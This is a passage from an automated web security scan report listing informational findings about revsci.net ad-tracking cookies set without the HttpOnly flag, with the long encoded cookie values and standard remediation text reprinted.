rtc_ayM_=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.139. http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10898/b3/0/3/1008211/466985162.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF40OhOXMMpjaBv3Dh/hL8rsB4rOfq5QuYnPnKayViGymJW18v6kTo+UWdpq+vTE99BUTLoKtiYg2S0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zXzZlP3ivfC9uJamaWvpbVB00uRyoJCxN4S+wrXmLMg4jrl3qYhDnGjIcgy9gae6cIsXGbuaKjHszrakjzsrBpiP7b6XoVz93fCrKVSnf88GCgSUpNtkT3S15lc2CHhtu8XK1CbHiTE2fU4nj8xJSflN9dF95kDfmCkFTiqyCNwDj+Iwb7m77ukVX0rooAClrM1X1rdn6EG0US43kZKfvsJxw9ZAjl5vuOhGxBLkL0cswvQYaX4r0R4yrutEdJoUzjrMUZTfvke5cSSFsgmL/X+OB15fwGhGvqEgY6dNO0dLGM27qLym4/iwljctD2BrS27lPl1kmLoDTx9AHqSfxgQdqUffqDv7y2cZvCEkvenBU4TMjItTHq0az01AhtBiy6Pk7biH//O86aK5eUhLLyZzUihPdAKP+kndJdxRsPS2JTz38xelQS4B2CmJCdOFHw/yFRFTJeD2xB7vhJ5j0hl5J5yNIi7sA4Wtc3hiT0RGlo2A5x9Kl45d9l+a/IWbcu9J4Vl59+5WbEzVtDgsZnfa6X8vOB3Fa1ahJJ3HhhXP//zqg=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:36 GMT; Path=/
rtc_HXHk=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.140. http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10898/b3/0/3/1008211/916907335.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNfEPF7gMQVVNGSXBLu+N09e4iyzUHYXzBFE1VBMg4+wLZJu3B5D/qNDdA7/IG7eVAV4cFPTEfYsNuO/7r68+Oz9i3bYhagy10tTmKmbVpGBg/vWbHRRVb7sEZ6QsY6gdHgg2s47sgz0G97xHNwkIFqosHoDy2sC6iIrWORd/ZDjLw/M8wiLJyJat86j0fqknm/avVqxtkIxy80dvt7Q==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:59 GMT; Path=/
rtc_78yf=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:33:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.141. http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D10898/b3/0/3/1008211/98295750.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5E+hOXMMpTaBv3Dh/hJU4xrMriQJSwsJSS2518p566AWsC6dZCCogy1fwjXjHJvVxCC5NyPuYuXxdU6jW0XnxxW5LaVCOktcrquTNuOWFTTkxfICGdlkVyCpK3b3iBtHZFHlC6tauUzkVsstlxUvHpxx6DjOYyhPvC5/ZjjhbqaES50QAhloD6YIsf2+FYRr0VuIwWQX4QMglVXTOe7YLEod92HudBfky4RL3Q239PgRK6oXAiPPaibO1jYM/Iz/kC/iihiL3rPthtLDeCHUZ3iH5dsjDx84V+C3xcXh455oXXiDJA+jeQPqSApTIk02czO7dpxnXVMEuNggt9rQ1n3YBmOEQT490yfGwKdC9wyySD2eInXvJI7TFlvjBdODqCSiBFUtVjWl6gKxWitgyWLkwKTtke7c9d/g8TWa+nRPnxb0dmeXqeTU+ES8BH0HuIbtXyrnUGRSOLCAE7iaUtfQ1qFqEzIUH3Mjn31mDjCdfCnjXPu45PRgweof1YCdlR8//I5+E0Y2aLwiTWDjpgMxu6Ut0+ebazQyKe2uAw/Vdofl0Icc4xApuNWcOA4lKLOVUj8vXZuLUEScdaDnMcicuqs1AU2EOJJtABY3UpLcODetKmmsZItjqo9Bx8HwAuF8B9F44lV3EsczCHrcngFfXCn66ogbuDw9D8wI; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:32:51 GMT; Path=/
rtc_LzCA=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:32:51 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.142. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E06560/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5E+BOQMQjXaBYKN45JxEWZonQbANETYV16Mat4I4b3eMT2reJyCAgxkrwHXjdBvil8hUNDCmRKXxZ/h5kwHGDalHsUn87uxBUSRZe6pMV7IXAPkHJ/EslY/e+hSJN094zUMXzQfj8hmxHSBJ7AEpulZ1oXkkCn/Blsyrn3JSJrmbWqdf4oPwfw8s1avKa5/g2bnYmftJUS5a2QpPOcZ5FGnYPA20XCLsFAj4gjQlj0gaJCrbA7xiUF3xDkNZXu9lFgchACALQHL9xjiE+VtLJfehgdlcFRzmSi9LjaCWzYcU3gKkdqu5maEgKHQiMXJf06ArRXUFpd8OWxB/zbkXatz3tdH3C4yfAiRT/3uJJKawqTyAKW9V4DYMkiYcx7mAIEnwPIY9xFA/Fx5Kf5U855YOddjrQatXyOPyhRiYxkCa/6Jde20sP8NjEFyM3fgjVNpx0waaDT92u+w3u4O3690ypK9zsU5cqOLVdSuv2d4ymEdecfmmJv2dcMscOZSj4/Np6R1us/L8E4Dr2zDdz0omd2C+mm6SP7HP+eXXAGKBijKhvPh+a/dzwtIlc1LUBsUyqCWQmHggP4Ya3CwB6d4bMkMdIYCQAlL+xqn4mVhHhOzWWY6mt2GT7UlT4zYh4rcHb5CcpgHIsIldqNBoHQ==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:21:25 GMT; Path=/
NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adcb5&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df5849a&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 11-Jul-2011 11:21:25 GMT; Path=/
rtc_wvmh=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:21:25 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.143. http://pix04.revsci.net/G07610/b3/0/3/noscript.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G07610/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFI0OheQIMVp94t6n7ILtKIEtdyqxPwaKhocXJX+1ZKic5njYIs9HYrq0bIzTlnSCIhQuWgZ0ja1WhQLXzC5PFsT1Y8FcytAHacXSpqQsYZvOkhZmA0aikEDJN/pB4U+02b3xP8vgx3+OZiCk0Kk2iIDPJDuHBy22YnoX+0zqQjPNkDNr266czIE0MGVX/Y/NxI48kH3sAASqKFs2KHe7Fc7HEqw8ECLQJKxkVyc5c5x181fEb6LdI3PaU+3R7UZxCTCIllviBz15aW3QJdVR0osHhipAn6PZ0JYN7/WQaeSiB0ceU65rBxgy7h4i4JavItPfDrcJMbt7ezfT2QmHU9hLg95V5OGzWMoOn+OAaAXRjiHYgJ04gRTQo2I2Gk7zZrHnNKWM9dfY7EBBLn93g1FoAFPv8A3nsr0bLcFfW4eQZ7Bfhb7ObvYMHX8w3MLoJx5Xvntl8AwmoAlw7WpK9BLG2BV50IdOU+TZnsizjLRcXLethY9ZCBCc7mVWMUJeWKt2ydTTi0RM3ygje51x96fCFqvjSU0VGFiIZXq9EHPrTO6astZwm4SM+DKiVxox9BRuYfXPHrsmzUZfxu5F0gT/G0GoLsGPXroGjY33lWdtVlCfIADDdBErp0tGTw/HcDe3dEj3QO7ZQM/JjI7DnkWHLBspvKKKy; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/
